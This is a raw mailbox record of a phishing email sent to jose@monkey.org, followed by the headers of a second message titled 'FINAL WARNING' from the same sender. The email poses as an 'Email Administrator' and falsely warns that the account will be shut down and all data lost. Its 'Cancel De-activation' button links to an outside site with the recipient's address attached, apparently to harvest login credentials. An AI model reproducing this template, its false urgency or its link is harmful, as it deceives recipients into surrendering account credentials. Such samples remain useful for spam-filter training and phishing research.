From: "E-mail Support" <import@erincwiklikb.nazwa.pl>
Date: Wed, 31 Jan 2018 19:41:12 -0800
Status: O
X-Status: 
X-Keywords:                  
X-UID: 412

You will not see this in a MIME-aware mail reader.
--===============0292259417==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

 =


  =

    	  =

   =

 =

   =

 =

   Server Message
  =


 =

   Dear jose@monkey.org , Our record indicates that you recently made a req=
uest to shutdown your e-mail and this request will be processed shortly.
 If this request was made accidentally and you have no knowledge of it, you=
 are advised to cancel the request now

   =

   =

    Cancel De-activation

   =

   =

   However, if you do not cancel this request your account will be shutdown=
 shortly and all your email data will be lost permanently. =

 Regards. =

Email Administrator

   =

   =

    =

 =

   =

   This message is auto-generated from E-mail security server, and replies =
sent to this email can not be delivered. This email is meant for: Account U=
ser =


 =

=20

--===============0292259417==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"/></head><BODY><P> </P>
<P><BR></P>
<DIV>
<TABLE style=3D"LINE-HEIGHT: 1.2; WIDTH: 100%; FONT-FAMILY: =E5=AE=8B=E4=BD=
=93, arial, verdana, sans-serif; FONT-SIZE: 14px" class=3Dgmail-m_175645309=
5726541178gmail-mceItemTable align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: normal; FONT-FAMILY: times; COLOR: rgb(0,0,0)" wi=
dth=3D"10%">&nbsp;</TD>
<TD style=3D"LINE-HEIGHT: normal; FONT-FAMILY: times; COLOR: rgb(0,0,0)" wi=
dth=3D"70%">
<TABLE style=3D"BORDER-BOTTOM: rgb(164,164,164) 1px solid; BORDER-LEFT: rgb=
(164,164,164) 1px solid; LINE-HEIGHT: 1.2; FONT-FAMILY: =E5=AE=8B=E4=BD=93,=
 arial, verdana, sans-serif; BORDER-TOP: rgb(164,164,164) 1px solid; BORDER=
-RIGHT: rgb(164,164,164) 1px solid" class=3Dgmail-m_1756453095726541178gmai=
l-mceItemTable cellSpacing=3D0>
<TBODY>
<TR>
<TD><BR class=3Dgmail-m_1756453095726541178gmail-m_-2030751744331676309m_57=
78711225047782211m_-1470746732401064809m_4560108787455409633gmail-m_-325935=
8352311558078gmail-m_3937476256601928948m_-7994467983036364834gmail-m_88475=
42582495995750m_7687707237803265586m_-1280969257274652397m_-633309639872291=
9939m_6191423713486368171m_6609069889435229479m_5696888628337359851gmail-m_=
4876559863826910818m_4782723801315509168m_-6535532882101783119m_-5924079535=
149632685gmail-m_1643535140201070010gmail-m_-4687737007873960388gmail-Apple=
-interchange-newline>
<TABLE style=3D"LINE-HEIGHT: 1.2; WIDTH: 100%; FONT-FAMILY: =E5=AE=8B=E4=BD=
=93, arial, verdana, sans-serif" class=3Dgmail-m_1756453095726541178gmail-m=
ceItemTable cellSpacing=3D0>
<TBODY>
<TR>
<TD bgColor=3D#045fb4 height=3D110><BR>
<TABLE style=3D"LINE-HEIGHT: 1.2; WIDTH: 80%; FONT-FAMILY: =E5=AE=8B=E4=BD=
=93, arial, verdana, sans-serif" class=3Dgmail-m_1756453095726541178gmail-m=
ceItemTable align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"TEXT-ALIGN: center"><SPAN style=3D"FONT-FAMILY: calibri; COLOR=
: rgb(255,255,255); FONT-SIZE: xx-large"><B>Server Message</B></SPAN></TD><=
/TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8><BR><BR>
<TABLE style=3D"LINE-HEIGHT: 1.2; WIDTH: 80%; FONT-FAMILY: =E5=AE=8B=E4=BD=
=93, arial, verdana, sans-serif" class=3Dgmail-m_1756453095726541178gmail-m=
ceItemTable align=3Dcenter>
<TBODY>
<TR>
<TD><SPAN style=3D"FONT-FAMILY: calibri; FONT-SIZE: large"><B>Dear <A style=
=3D"FONT-FAMILY: tahoma, helvetica, sans-serif; COLOR: rgb(56,148,193); FON=
T-SIZE: 13px; text-decoration-line: none" href=3D"mailto:25" target=3D_blan=
k><B><FONT size=3D4>jose@monkey.org</FONT></B></A> ,</B></SPAN>
<P><SPAN style=3D"FONT-FAMILY: calibri; FONT-SIZE: medium">Our record indic=
ates that you recently made a request to shutdown your e-mail and this requ=
est will be processed shortly.</SPAN></P>
<P><SPAN style=3D"FONT-FAMILY: calibri; FONT-SIZE: medium">If this request =
was made accidentally and you have no knowledge of it, you are advised to c=
ancel the request now</SPAN></P></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D15>&nbsp;</TD></TR>
<TR>
<TD bgColor=3D#f8f8f8>
<TABLE style=3D"LINE-HEIGHT: 1.2; WIDTH: 80%; FONT-FAMILY: =E5=AE=8B=E4=BD=
=93, arial, verdana, sans-serif; HEIGHT: 60px" class=3Dgmail-m_175645309572=
6541178gmail-mceItemTable bgColor=3D#045fb4 align=3Dcenter>
<TBODY>
<TR>
<TD>
<DIV align=3Dcenter><SPAN style=3D"FONT-SIZE: x-large"><A style=3D"COLOR: r=
gb(56,148,193); text-decoration-line: none" href=3D"http://aretemechanical.=
com/.upd/all1/index.php?email=3Djose@monkey.org" target=3D_blank><SPAN styl=
e=3D"FONT-FAMILY: calibri; COLOR: rgb(255,255,255)">Cancel De-activation</S=
PAN></A></SPAN><BR></DIV></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D20>&nbsp;</TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D70>
<TABLE style=3D"LINE-HEIGHT: 1.2; WIDTH: 80%; FONT-FAMILY: =E5=AE=8B=E4=BD=
=93, arial, verdana, sans-serif" class=3Dgmail-m_1756453095726541178gmail-m=
ceItemTable align=3Dcenter>
<TBODY>
<TR>
<TD><SPAN style=3D"FONT-FAMILY: calibri; FONT-SIZE: medium">However, if you=
 do not cancel this request your account will be shutdown shortly&nbsp;and =
all your email data will be lost permanently.&nbsp;<BR></SPAN>
<P><SPAN style=3D"FONT-FAMILY: calibri; FONT-SIZE: medium">Regards.&nbsp;<B=
R><B>Email Administrator</B></SPAN></P></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D10>&nbsp;</TD></TR>
<TR>
<TD bgColor=3D#f8f8f8>
<TABLE style=3D"LINE-HEIGHT: 1.2; WIDTH: 80%; FONT-FAMILY: =E5=AE=8B=E4=BD=
=93, arial, verdana, sans-serif; HEIGHT: 10px" class=3Dgmail-m_175645309572=
6541178gmail-mceItemTable align=3Dcenter>
<TBODY>
<TR>
<TD>
<HR align=3Dcenter width=3D"100%">
</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8>
<TABLE style=3D"LINE-HEIGHT: 1.2; WIDTH: 80%; FONT-FAMILY: =E5=AE=8B=E4=BD=
=93, arial, verdana, sans-serif" class=3Dgmail-m_1756453095726541178gmail-m=
ceItemTable align=3Dcenter>
<TBODY>
<TR>
<TD><SPAN style=3D"FONT-FAMILY: calibri; FONT-SIZE: small">This message is =
auto-generated from E-mail security server, and replies sent to this email =
can not be delivered.&nbsp;This email is meant for:&nbsp;<B><SPAN style=3D"=
COLOR: rgb(4,95,180)">Account User</SPAN></B>&nbsp;<BR></SPAN></TD></TR></T=
BODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR>=
</TBODY></TABLE></DIV>
<P><BR>&nbsp;</P></BODY></HTML>
--===============0292259417==--

From jose@monkey.org Fri Feb  2 02:03:09 2018 +0000
Return-Path: import@erincwiklikb.nazwa.pl
Delivered-To: jose@monkey.org
X-FDA: 73794515298.20.step99_8fd9c782eca37
X-Spam-Summary: 75,0,0,bc4c5b4ccce3bbf7,d41d8cd98f00b204,import@erincwiklikb.nazwa.pl,:,RULES_HIT:2:41:72:152:379:495:800:962:967:969:973:983:988:989:1189:1208:1221:1254:1260:1261:1263:1313:1314:1381:1431:1433:1434:1436:1437:1516:1517:1518:1535:1571:1575:1588:1589:1592:1594:1606:1685:1714:1730:1777:1792:2196:2198:2199:2200:2525:2527:2560:2563:2610:2682:2685:2693:2737:2771:2827:2859:2890:2894:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3351:3503:3504:3586:3865:3866:3867:3868:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4118:4321:4361:4552:5007:6261:6650:6678:7652:8513:8516:8599:8603:8634:8797:8957:8987:9025:9082:9121:9466:10004:10215:10231:10346:11233:11473:11480:11657:11658:11783:11914:12043:12438:12555:12764:12895:12986:13025:13139:13237:13374:13546:13551:13975:14093:14246:14515:14827:14829:14877:18000:21080:21433:21450:21451:21483:21524:21627:21660:21716:30001:30021:30022:30026:30051:30054,0,RBL:77.55.217.209-irl.urbl.hostedem
X-HE-Tag: step99_8fd9c782eca37
X-Filterd-Recvd-Size: 7423
Received: from erincwiklikb.localdomain (aij209.rev.netart.pl [77.55.217.209])
	by imf28.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri,  2 Feb 2018 02:03:08 +0000 (UTC)
Received: from [192.158.238.79] (unknown [192.158.238.79])
	by erincwiklikb.localdomain (Postfix) with ESMTPA id 598A520D2C30
	for <jose@monkey.org>; Thu,  1 Feb 2018 14:24:32 +0100 (CET)
Content-Type: multipart/alternative; boundary="===============1089936663=="
MIME-Version: 1.0
Subject: FINAL WARNING: jose@monkey.org De-activation Notice
To: jose@monkey.org
